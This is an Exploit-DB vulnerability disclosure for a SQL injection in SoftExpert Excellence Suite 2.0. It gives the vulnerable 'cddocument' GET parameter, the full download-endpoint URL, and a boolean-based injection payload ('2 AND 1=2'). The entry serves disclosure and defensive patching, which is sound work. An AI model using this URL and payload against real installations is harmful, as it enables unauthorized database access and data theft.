EDB-ID: 44981 | Author: Seren PORSUK | Published: 2018-07-05 | CVE: N/A | Type: Webapps | Platform: PHP | Vulnerable App: N/A | # Author: Seren PORSUK
# Date: 2018-06-28
# Type: webapps
# Platform: PHP
# CVE= N/A
# Vendor Homepage : https://www.softexpert.com/solucao/softexpert-excellence-suite/
# DETAILS
# A SQL injection vulnerability in the SoftExpert (SE) Excellence Suite 2.0
# allows remote authenticated users to perform SQL heuristics by pulling
# information from the database with the "cddocument" parameter in the
# "Downloading Electronic Documents" section.
# Vulnerable Parameter Type : GET
# Vulnerable Parameter : cddocument
#Vulnerable URL :
http://localhost/se/v75408/generic/gn_eletronicfile_view/1.1/view_eletronic_download.php?class_name=dc_eletronic_file&classwaybusinessrule=class.dc_eletronic_file.inc&action=4&cddocument=[SQLi]&saveas1&mainframe=1&cduser=6853
#SQLi Parameter : 2 AND 1=2
